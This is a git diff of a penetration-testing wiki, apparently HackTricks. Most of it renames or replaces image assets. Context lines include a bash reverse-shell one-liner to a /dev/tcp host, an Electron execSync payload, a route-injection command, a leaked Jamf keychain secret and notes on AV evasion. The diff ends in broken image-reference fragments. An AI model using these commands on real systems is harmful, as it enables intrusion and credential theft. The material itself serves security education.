diff --git a/.gitbook/assets/image (11).png b/.gitbook/assets/image (11).png
index 218780f0..3ae28122 100644
Binary files a/.gitbook/assets/image (11).png and b/.gitbook/assets/image (11).png differ
diff --git a/.gitbook/assets/image (13).png b/.gitbook/assets/image (13).png
index 248451f1..c7834192 100644
Binary files a/.gitbook/assets/image (13).png and b/.gitbook/assets/image (13).png differ
diff --git a/.gitbook/assets/image (14).png b/.gitbook/assets/image (14).png
index 4ede9266..a254c23a 100644
Binary files a/.gitbook/assets/image (14).png and b/.gitbook/assets/image (14).png differ
diff --git a/.gitbook/assets/image (15).png b/.gitbook/assets/image (15).png
deleted file mode 100644
index 0ef3cc20..00000000
Binary files a/.gitbook/assets/image (15).png and /dev/null differ
diff --git a/.gitbook/assets/image (16).png b/.gitbook/assets/image (16).png
index 20ead5c0..e8b6b213 100644
Binary files a/.gitbook/assets/image (16).png and b/.gitbook/assets/image (16).png differ
diff --git a/.gitbook/assets/image (17) (3).png b/.gitbook/assets/image (17) (3).png
index 9b6db2a3..feabde2d 100644
Binary files a/.gitbook/assets/image (17) (3).png and b/.gitbook/assets/image (17) (3).png differ
diff --git a/.gitbook/assets/image (17).png b/.gitbook/assets/image (17).png
index 77f2a896..9b6db2a3 100644
Binary files a/.gitbook/assets/image (17).png and b/.gitbook/assets/image (17).png differ
diff --git a/.gitbook/assets/image (18).png b/.gitbook/assets/image (18).png
index 3ae28122..c0008cb7 100644
Binary files a/.gitbook/assets/image (18).png and b/.gitbook/assets/image (18).png differ
diff --git a/.gitbook/assets/image (19) (1).png b/.gitbook/assets/image (19) (1).png
index 3305c860..ab835abd 100644
Binary files a/.gitbook/assets/image (19) (1).png and b/.gitbook/assets/image (19) (1).png differ
diff --git a/.gitbook/assets/image (19).png b/.gitbook/assets/image (19).png
index c7834192..3305c860 100644
Binary files a/.gitbook/assets/image (19).png and b/.gitbook/assets/image (19).png differ
diff --git a/.gitbook/assets/image (2) (1) (1) (2) (1).png b/.gitbook/assets/image (2) (1) (1) (2) (1).png
new file mode 100644
index 00000000..c3ffd553
Binary files /dev/null and b/.gitbook/assets/image (2) (1) (1) (2) (1).png differ
diff --git a/.gitbook/assets/image (2) (1) (1) (2).png b/.gitbook/assets/image (2) (1) (1) (2).png
index c3ffd553..163b502d 100644
Binary files a/.gitbook/assets/image (2) (1) (1) (2).png and b/.gitbook/assets/image (2) (1) (1) (2).png differ
diff --git a/.gitbook/assets/image (2) (1) (1).png b/.gitbook/assets/image (2) (1) (1).png
index 163b502d..eb7611c9 100644
Binary files a/.gitbook/assets/image (2) (1) (1).png and b/.gitbook/assets/image (2) (1) (1).png differ
diff --git a/.gitbook/assets/image (2) (1).png b/.gitbook/assets/image (2) (1).png
index eb7611c9..4bb5f270 100644
Binary files a/.gitbook/assets/image (2) (1).png and b/.gitbook/assets/image (2) (1).png differ
diff --git a/.gitbook/assets/image (2).png b/.gitbook/assets/image (2).png
index 4bb5f270..ed57bd5f 100644
Binary files a/.gitbook/assets/image (2).png and b/.gitbook/assets/image (2).png differ
diff --git a/.gitbook/assets/image (20) (1).png b/.gitbook/assets/image (20) (1).png
index e5d569d4..fc66de85 100644
Binary files a/.gitbook/assets/image (20) (1).png and b/.gitbook/assets/image (20) (1).png differ
diff --git a/.gitbook/assets/image (20).png b/.gitbook/assets/image (20).png
index a254c23a..e5d569d4 100644
Binary files a/.gitbook/assets/image (20).png and b/.gitbook/assets/image (20).png differ
diff --git a/.gitbook/assets/image (3) (1) (1) (1).png b/.gitbook/assets/image (3) (1) (1) (1).png
index 455fbb8b..eb57ea91 100644
Binary files a/.gitbook/assets/image (3) (1) (1) (1).png and b/.gitbook/assets/image (3) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (3) (1) (1).png b/.gitbook/assets/image (3) (1) (1).png
index eb57ea91..6874f9c8 100644
Binary files a/.gitbook/assets/image (3) (1) (1).png and b/.gitbook/assets/image (3) (1) (1).png differ
diff --git a/.gitbook/assets/image (3) (1).png b/.gitbook/assets/image (3) (1).png
index 6874f9c8..38b71f3d 100644
Binary files a/.gitbook/assets/image (3) (1).png and b/.gitbook/assets/image (3) (1).png differ
diff --git a/.gitbook/assets/image (3).png b/.gitbook/assets/image (3).png
index 38b71f3d..218780f0 100644
Binary files a/.gitbook/assets/image (3).png and b/.gitbook/assets/image (3).png differ
diff --git a/.gitbook/assets/image (4) (1) (1) (1) (1).png b/.gitbook/assets/image (4) (1) (1) (1) (1).png
new file mode 100644
index 00000000..2fde683e
Binary files /dev/null and b/.gitbook/assets/image (4) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (4) (1) (1) (1).png b/.gitbook/assets/image (4) (1) (1) (1).png
index 2fde683e..6c4e73dc 100644
Binary files a/.gitbook/assets/image (4) (1) (1) (1).png and b/.gitbook/assets/image (4) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (4) (1) (1).png b/.gitbook/assets/image (4) (1) (1).png
index 6c4e73dc..0d4cd8ba 100644
Binary files a/.gitbook/assets/image (4) (1) (1).png and b/.gitbook/assets/image (4) (1) (1).png differ
diff --git a/.gitbook/assets/image (4) (1).png b/.gitbook/assets/image (4) (1).png
index 0d4cd8ba..743e51c3 100644
Binary files a/.gitbook/assets/image (4) (1).png and b/.gitbook/assets/image (4) (1).png differ
diff --git a/.gitbook/assets/image (4).png b/.gitbook/assets/image (4).png
index 743e51c3..248451f1 100644
Binary files a/.gitbook/assets/image (4).png and b/.gitbook/assets/image (4).png differ
diff --git a/.gitbook/assets/image (5) (1) (1) (2) (1).png b/.gitbook/assets/image (5) (1) (1) (2) (1).png
new file mode 100644
index 00000000..5dc69a4e
Binary files /dev/null and b/.gitbook/assets/image (5) (1) (1) (2) (1).png differ
diff --git a/.gitbook/assets/image (5) (1) (1) (2).png b/.gitbook/assets/image (5) (1) (1) (2).png
index 5dc69a4e..114d3565 100644
Binary files a/.gitbook/assets/image (5) (1) (1) (2).png and b/.gitbook/assets/image (5) (1) (1) (2).png differ
diff --git a/.gitbook/assets/image (5) (1) (1).png b/.gitbook/assets/image (5) (1) (1).png
index 114d3565..4642e658 100644
Binary files a/.gitbook/assets/image (5) (1) (1).png and b/.gitbook/assets/image (5) (1) (1).png differ
diff --git a/.gitbook/assets/image (5) (1).png b/.gitbook/assets/image (5) (1).png
index 4642e658..4fbfba8c 100644
Binary files a/.gitbook/assets/image (5) (1).png and b/.gitbook/assets/image (5) (1).png differ
diff --git a/.gitbook/assets/image (5).png b/.gitbook/assets/image (5).png
index 4fbfba8c..4ede9266 100644
Binary files a/.gitbook/assets/image (5).png and b/.gitbook/assets/image (5).png differ
diff --git a/.gitbook/assets/image (6) (2) (1).png b/.gitbook/assets/image (6) (2) (1).png
new file mode 100644
index 00000000..5e036118
Binary files /dev/null and b/.gitbook/assets/image (6) (2) (1).png differ
diff --git a/.gitbook/assets/image (6) (2).png b/.gitbook/assets/image (6) (2).png
index 5e036118..345e6bee 100644
Binary files a/.gitbook/assets/image (6) (2).png and b/.gitbook/assets/image (6) (2).png differ
diff --git a/.gitbook/assets/image (6).png b/.gitbook/assets/image (6).png
index 345e6bee..0ef3cc20 100644
Binary files a/.gitbook/assets/image (6).png and b/.gitbook/assets/image (6).png differ
diff --git a/.gitbook/assets/image (7) (1) (3).png b/.gitbook/assets/image (7) (1) (3).png
new file mode 100644
index 00000000..9a68acef
Binary files /dev/null and b/.gitbook/assets/image (7) (1) (3).png differ
diff --git a/.gitbook/assets/image (7) (1).png b/.gitbook/assets/image (7) (1).png
index 9a68acef..d990711a 100644
Binary files a/.gitbook/assets/image (7) (1).png and b/.gitbook/assets/image (7) (1).png differ
diff --git a/.gitbook/assets/image (7).png b/.gitbook/assets/image (7).png
index d990711a..20ead5c0 100644
Binary files a/.gitbook/assets/image (7).png and b/.gitbook/assets/image (7).png differ
diff --git a/.gitbook/assets/image (8).png b/.gitbook/assets/image (8).png
index ed57bd5f..77f2a896 100644
Binary files a/.gitbook/assets/image (8).png and b/.gitbook/assets/image (8).png differ
diff --git a/backdoors/salseo.md b/backdoors/salseo.md
index d98dbce9..21f0bc44 100644
--- a/backdoors/salseo.md
+++ b/backdoors/salseo.md
@@ -105,11 +105,11 @@ Open the SalseoLoader project using Visual Studio.
#### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...**
- (1) (1) (1).png>)
+ (1) (1) (1) (1).png>)
#### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)**
- (1) (1) (1).png>)
+ (1) (1) (1) (1).png>)
In your project folder have appeared the files: **DllExport.bat** and **DllExport\_Configure.bat**
@@ -117,7 +117,7 @@ In your project folder have appeared the files: **DllExport.bat** and **DllExpor
Press **Uninstall** (yeah, its weird but trust me, it is necessary)
- (1) (1) (2).png>)
+ (1) (1) (2) (1).png>)
### **Exit Visual Studio and execute DllExport\_configure**
diff --git a/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md b/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md
index c6aede60..fdcfd6a9 100644
--- a/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md
+++ b/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md
@@ -137,7 +137,7 @@ Arguments of the script:
~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
```
-
+
**Our host seems to be in trouble :)**
diff --git a/macos-hardening/macos-red-teaming/README.md b/macos-hardening/macos-red-teaming/README.md
index 36887f55..3f5fc29a 100644
--- a/macos-hardening/macos-red-teaming/README.md
+++ b/macos-hardening/macos-red-teaming/README.md
@@ -49,11 +49,11 @@ You could use the script [**JamfSniper.py**](https://github.com/WithSecureLabs/J
Moreover, after finding proper credentials you could be able to brute-force other usernames with the next form:
-.png>)
+.png>)
#### JAMF device Authentication
-
+
The **`jamf`** binary contained the secret to open the keychain which at the time of the discovery was **shared** among everybody and it was: **`jk23ucnq91jfu9aj`**.\
Moreover, jamf **persist** as a **LaunchDaemon** in **`/Library/LaunchAgents/com.jamf.management.agent.plist`**
@@ -100,7 +100,7 @@ With this information, **create a VM** with the **stolen** Hardware **UUID** and
#### Secrets stealing
-
a
+
a
You could also monitor the location `/Library/Application Support/Jamf/tmp/` for the **custom scripts** admins might want to execute via Jamf as they are **placed here, executed and removed**. These scripts **might contain credentials**.
@@ -203,7 +203,7 @@ MacOS Red Teaming is different from a regular Windows Red Teaming as usually **M
When a file is downloaded in Safari, if its a "safe" file, it will be **automatically opened**. So for example, if you **download a zip**, it will be automatically decompressed:
-
+
## References
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-pid-reuse.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-pid-reuse.md
index f8bd4db1..d12d0a87 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-pid-reuse.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-pid-reuse.md
@@ -23,7 +23,7 @@ This function will make the **allowed binary own the PID** but the **malicious X
If you find the function **`shouldAcceptNewConnection`** or a function called by it **calling** **`processIdentifier`** and not calling **`auditToken`**. It highly probable means that it's v**erifying the process PID** and not the audit token.\
Like for example in this image (taken from the reference):
-
+
Check this example exploit (again, taken from the reference) to see the 2 parts of the exploit:
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md
index 6796980a..02009b0b 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md
@@ -22,7 +22,7 @@ Obviously, this is so powerful, it's complicated to load a kernel extension. The
* Going into **recovery mode** Kexts need to be **allowed to be loaded**:
-
+
* The Kext must be **signed with a kernel code signing certificate**, which can only be granted by **Apple**. Who will be **reviewing** in detail the **company** and the **reasons** why this is needed.
* The Kext also needs to be **notarized**, Apple will be able to check it for malware.
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md
index c63f3ab5..23d5baf4 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md
@@ -16,7 +16,7 @@
Unlike Kernel Extensions, **System Extensions run in user space** instead of kernel space, reducing the risk of a system crash due to extension malfunction.
-
+
There are three types of system extensions: **DriverKit** Extensions, **Network** Extensions, and **Endpoint Security** Extensions.
@@ -56,7 +56,7 @@ The events that the Endpoint Security framework can monitor are categorized into
### Endpoint Security Framework Architecture
-
+
**User-space communication** with the Endpoint Security framework happens through the IOUserClient class. Two different subclasses are used, depending on the type of caller:
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md
index 8ba50531..9e8cd396 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md
@@ -76,7 +76,7 @@ fat_magic FAT_MAGIC
or using the [Mach-O View](https://sourceforge.net/projects/machoview/) tool:
-
+
As you may be thinking usually a universal binary compiled for 2 architectures **doubles the size** of one compiled for just 1 arch.
@@ -199,11 +199,11 @@ struct section_64 { /* for 64-bit architectures */
Example of **section header**:
-
+
If you **add** the **section offset** (0x37DC) + the **offset** where the **arch starts**, in this case `0x18000` --> `0x37DC + 0x18000 = 0x1B7DC`
-
+
It's also possible to get **headers information** from the **command line** with:
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md
index 0ad7001c..8de71d0c 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md
@@ -32,7 +32,7 @@ require('child_process').execSync('/System/Applications/Calculator.app/Contents/
{% endcode %}
{% hint style="danger" %}
-Note that now **hardened** Electron applications will **ignore node parameters** (such as --inspect) when launched unless the env variable **`ELECTRON_RUN_AS_NODE`** is set.
+Note that now **hardened** Electron applications with **RunAsNode** disabled will **ignore node parameters** (such as --inspect) when launched unless the env variable **`ELECTRON_RUN_AS_NODE`** is set.
However, you could still use the electron param `--remote-debugging-port=9229` but the previous payload won't work to execute other processes.
{% endhint %}
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md
index 1dad2256..5ec636d8 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md
@@ -14,7 +14,7 @@
## Sandbox loading process
-
In the previous image it's possible to observe **how the sandbox will be loaded** when an application with the entitlement **`com.apple.security.app-sandbox`** is run.
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses.md
index 6aa9757b..3a92811e 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses.md
@@ -143,7 +143,7 @@ $> ls ~/Documents
Notes had access to TCC protected locations but when a note is created this is **created in a non-protected location**. So, you could ask notes to copy a protected file in a noe (so in a non-protected location) and then access the file:
-
+
### CVE-2021-XXXX - Translocation
@@ -387,7 +387,7 @@ The folder **`/var/db/locationd/` wasn't protected from DMG mounting** so it was
In several occasions files will store sensitive information like emails, phone numbers, messages... in non protected locations (which count as a vulnerability in Apple).
-
+
## Reference
diff --git a/network-services-pentesting/pentesting-postgresql.md b/network-services-pentesting/pentesting-postgresql.md
index a67a09b6..15e1f2d1 100644
--- a/network-services-pentesting/pentesting-postgresql.md
+++ b/network-services-pentesting/pentesting-postgresql.md
@@ -479,7 +479,7 @@ In[ this **writeup**](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem
When you try to **make another user owner of a table** you should get an **error** preventing it, but apparently GCP gave that **option to the not-superuser postgres user** in GCP:
-
+
Joining this idea with the fact that when the **INSERT/UPDATE/**[**ANALYZE**](https://www.postgresql.org/docs/13/sql-analyze.html) commands are executed on a **table with an index function**, the **function** is **called** as part of the command with the **table** **owner’s permissions**. It's possible to create an index with a function and give owner permissions to a **super user** over that table, and then run ANALYZE over the table with the malicious function that will be able to execute commands because it's using the privileges of the owner.
diff --git a/network-services-pentesting/pentesting-web/put-method-webdav.md b/network-services-pentesting/pentesting-web/put-method-webdav.md
index 1a169ddc..656d66b9 100644
--- a/network-services-pentesting/pentesting-web/put-method-webdav.md
+++ b/network-services-pentesting/pentesting-web/put-method-webdav.md
@@ -42,7 +42,7 @@ davtest [-auth user:password] -sendbd auto -url http:// #Try to upload every
Output sample:
- (1) (1).png>)
+ (1).png>)
This doesn't mean that **.txt** and **.html extensions are being executed**. This mean that you can **access this files** through the web.
diff --git a/network-services-pentesting/pentesting-web/rocket-chat.md b/network-services-pentesting/pentesting-web/rocket-chat.md
index 64584b99..4aa91eb7 100644
--- a/network-services-pentesting/pentesting-web/rocket-chat.md
+++ b/network-services-pentesting/pentesting-web/rocket-chat.md
@@ -35,12 +35,12 @@ exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
* Configure WebHook script:
-
+
* Save changes
* Get the generated WebHook URL:
-
+
* Call it with curl and you shuold receive the rev shell
diff --git a/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md b/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md
index 759ce057..0ef0b9a4 100644
--- a/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md
+++ b/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md
@@ -206,7 +206,7 @@ The following will add a `Location` header to the response
```
-
+
#### CRLF in Add header (**CVE-2019-2438)**
diff --git a/pentesting-web/xss-cross-site-scripting/dom-invader.md b/pentesting-web/xss-cross-site-scripting/dom-invader.md
index 4d219b62..62d377de 100644
--- a/pentesting-web/xss-cross-site-scripting/dom-invader.md
+++ b/pentesting-web/xss-cross-site-scripting/dom-invader.md
@@ -27,11 +27,11 @@ DOM Invader integrates a tab within the browser's DevTools panel enabling the fo
In the Burp's builtin browser go to the **Burp extension** and enable it:
-
+
Noe refresh the page and in the **Dev Tools** you will find the **DOM Invader tab:**
-
+
### Inject a Canary
@@ -69,7 +69,7 @@ You can click each message to view more detailed information about it, including
DOM Invader can also search for **Prototype Pollution vulnerabilities**. First, you need to enable it:
-
+
Then, it will **search for sources** that enable you to add arbitrary properties to the **`Object.prototype`**.
diff --git a/todo/radio-hacking/flipper-zero/fz-ibutton.md b/todo/radio-hacking/flipper-zero/fz-ibutton.md
index f004a931..50831ea8 100644
--- a/todo/radio-hacking/flipper-zero/fz-ibutton.md
+++ b/todo/radio-hacking/flipper-zero/fz-ibutton.md
@@ -24,7 +24,7 @@ For more info about what is an iButton check:
The **blue** part of the following imageis how you would need to **put the real iButton** so the Flipper can **read it.** The **green** part is how you need to **touch the reader** with the Flipper zero to **correctly emulate an iButton**.
-
+
## Actions
diff --git a/todo/radio-hacking/ibutton.md b/todo/radio-hacking/ibutton.md
index 43169dff..777c8363 100644
--- a/todo/radio-hacking/ibutton.md
+++ b/todo/radio-hacking/ibutton.md
@@ -16,7 +16,7 @@
iButton is a generic name for an electronic identification key packed in a **coin-shaped metal container**. It is also called **Dallas Touch** Memory or contact memory. Even though it is often wrongly referred to as a “magnetic” key, there is **nothing magnetic** in it. In fact, a full-fledged **microchip** operating on a digital protocol is hidden inside.
-
+
### What is iButton?
diff --git a/todo/radio-hacking/infrared.md b/todo/radio-hacking/infrared.md
index 9ccdb082..1a415aad 100644
--- a/todo/radio-hacking/infrared.md
+++ b/todo/radio-hacking/infrared.md
@@ -32,7 +32,7 @@ IR protocols differ in 3 factors:
Bits are encoded by modulating the duration of the space between pulses. The width of the pulse itself is constant.
-
+
**2. Pulse Width Encoding**
diff --git a/windows-hardening/active-directory-methodology/ad-certificates.md b/windows-hardening/active-directory-methodology/ad-certificates.md
index 730a7f97..64d990a3 100644
--- a/windows-hardening/active-directory-methodology/ad-certificates.md
+++ b/windows-hardening/active-directory-methodology/ad-certificates.md
@@ -7,7 +7,7 @@
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
@@ -113,7 +113,7 @@ The **security descriptor** configured on the **Enterprise CA** defines these ri
This ultimately ends up setting the Security registry value in the key **`HKLM\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration`** on the CA server. We have encountered several AD CS servers that grant low-privileged users remote access to this key via remote registry:
-
+
Low-privileged users can also **enumerate this via DCOM** using the `ICertAdminD2` COM interface’s `GetCASecurity` method. However, normal Windows clients need to install the Remote Server Administration Tools (RSAT) to use it since the COM interface and any COM objects that implement it are not present on Windows by default.
@@ -226,7 +226,7 @@ certutil -v -dstemplate #enumerate certificate templates
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
diff --git a/windows-hardening/av-bypass.md b/windows-hardening/av-bypass.md
index fae40774..aa765ddf 100644
--- a/windows-hardening/av-bypass.md
+++ b/windows-hardening/av-bypass.md
@@ -54,7 +54,7 @@ It turns out that Microsoft Defender's Sandbox computername is HAL9TH, so, you c
Some other really good tips from [@mgeeky](https://twitter.com/mariuszbit) for going against Sandboxes
-
As we've said before in this post, **public tools** will eventually **get detected**, so, you should ask yourself something:
@@ -303,7 +303,7 @@ Most C2 frameworks (sliver, Covenant, metasploit, CobaltStrike, Havoc, etc.) alr
It involves **spawning a new sacrificial process**, inject your post-exploitation malicious code into that new process, execute your malicious code and when finished, kill the new process. This has both its benefits and its drawbacks. The benefit to the fork and run method is that execution occurs **outside** our Beacon implant process. This means that if something in our post-exploitation action goes wrong or gets caught, there is a **much greater chance** of our **implant surviving.** The drawback is that you have a **greater chance** of getting caught by **Behavioural Detections**.
-
+
* **Inline**
diff --git a/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md b/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
index 3e6568da..e97e14a6 100644
--- a/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
+++ b/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
@@ -57,7 +57,7 @@ if ($envPath -notlike "*$folderPath*") {
* **After** the **file** is **generated**, **close** the opened **`procmon`** window and **open the events file**.
* Add these **filters** and you will find all the Dlls that some **proccess tried to load** from the writable System Path folder:
-
+
### Missed Dlls
 (1) (2).png)
 (1).png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
 (1).png)
 (1).png)
 (1) (1).png)
.png)
.png)
.png)
.png)
 (1).png)
 (1) (1).png)
 (2).png)
 (1).png)
 (1) (1).png)
.png)
 (1).png)
.png)
.png)
.png)
.png)
 (1) (1).png)
 (1) (1) (1).png)
 (1) (1).png)
 (1) (1) (2).png)
 (1) (1).png)
 (1) (1) (1).png)
 (1) (1).png)
 (1) (1) (2).png)
 (1).png)
 (1) (1).png)
 (1).png)
 (1).png)
 (1).png)
.png)
 (1).png)
.png)
 (3).png)
.png)
 (2).png)
 (2) (1).png)
 (1) (1) (2).png)
 (1) (1) (2) (1).png)
 (1).png)
 (1) (3).png)
 (3).png)
.png)